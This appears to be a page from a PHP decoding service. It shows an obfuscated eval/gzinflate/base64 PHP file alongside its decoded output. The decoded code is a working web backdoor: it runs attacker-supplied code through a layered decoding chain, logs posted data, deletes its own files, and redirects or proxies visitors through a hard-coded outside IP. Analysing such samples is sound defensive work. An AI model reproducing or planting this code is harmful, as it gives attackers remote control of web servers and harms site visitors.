Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode("FZfFrsbajoTf5Y7OUQZhUusOwvyHcdIKM3OevndPl7Qsy7KrviqvdP..

Decoded Output download

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r']))
{
	print $_GET['r'];
}

elseif (isset($_GET['x']))
{
	@unlink('default.log');
	@unlink('default.tmp');
	@unlink('default.txt');
	@unlink('default.php');

	print $_GET['x'];
}

elseif (isset($_POST['e']))
{
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}

elseif (strlen($_POST['num'])==12 && isset($_POST['buffer']) && $_POST['option']=='g')
{
	$fp=@fopen('default.log','a');
	@flock($fp,LOCK_EX);
	@fputs($fp,$_POST['buffer']."
");
	@flock($fp,LOCK_UN);
	@fclose($fp);
}

elseif (isset($_GET['up']))
{
	print file_get_contents('default.log');

	$fp=@fopen('default.log','w');
	@flock($fp,LOCK_EX);
	@fputs($fp,'');
	@flock($fp,LOCK_UN);
	@fclose($fp);
}

elseif (preg_match('/^\/([a-z]{4})[.]html/i', $_SERVER['REQUEST_URI']))
{
	$doms = @file_get_contents('default.txt');

	if (time()-@filemtime('default.tmp') > 10) @unlink('default.tmp');

	if (time()-@filemtime('default.txt') > 60 && !@file_exists('default.tmp'))
	{
		$fp = @fopen ('default.tmp', 'w');
		@flock($fp, LOCK_EX);
		@fputs($fp, time());
		@flock($fp, LOCK_UN);
		@fclose($fp);

		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206/index.php?u='.mt_rand(1000,9999));
		curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_VERBOSE, 0);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		curl_setopt($ch, CURLOPT_TIMEOUT, 7);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
		$doms = curl_exec($ch);
		curl_close($ch);

		if (strlen($doms) > 0)
		{
			$fp = @fopen ('default.txt', 'w');
			@flock($fp, LOCK_EX);
			@fputs($fp, $doms);
			@flock($fp, LOCK_UN);
			@fclose($fp);
		}

		@unlink('default.tmp');
	}

	if (strlen($doms) > 0)
	{
		$doms = explode("
",trim(str_replace("
", "", $doms)));

		shuffle($doms);

		$url = 'http://'.$doms[0].str_replace('.html','.htm',$_SERVER['REQUEST_URI']);

		header('HTTP/1.1 301 Moved Permanently');
		header('Location: '.$url);

		print '<html><head><meta http-equiv="refresh" content="0;url='.$url.'"></head><body><script type="text/javascript">window.location="'.$url.'";</script></body></html>';
	}
}

elseif (preg_match('/^\/([a-z0-9]{1,4})[.](htm|pdf|jar)/i', $_SERVER['REQUEST_URI']))
{
	if (isset($_SERVER['HTTP_X_REAL_IP'])) $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_REAL_IP'];

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206' . $_SERVER['REQUEST_URI']);
	curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_VERBOSE, 0);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
	curl_setopt($ch, CURLOPT_TIMEOUT, 7);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
	curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);

	$page = curl_exec($ch);

	curl_close($ch);

	if (strlen($page) > 0)
	{
		$page = str_replace ("HTTP/1.1 100 Continue

", '', $page);
	
		list($headers, $page) = explode("

", $page, 2);
	
		$headers = explode("
", trim($headers));

		foreach ($headers as $header) if (preg_match('/(HTTP|Expires|Content|Cache|Pragma|Location)/Usi', $header)) header($header);
	
		print $page;
	}
}

exit;

Did this file decode correctly?

Original Code

<?php eval(gzinflate(base64_decode("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"))); ?><?php

Function Calls

gzinflate 28
base64_decode 28

Variables

None

Stats

MD5 a8a39e3dfcd96b0765125cd868e68271
Eval Count 28
Decode Time 132 ms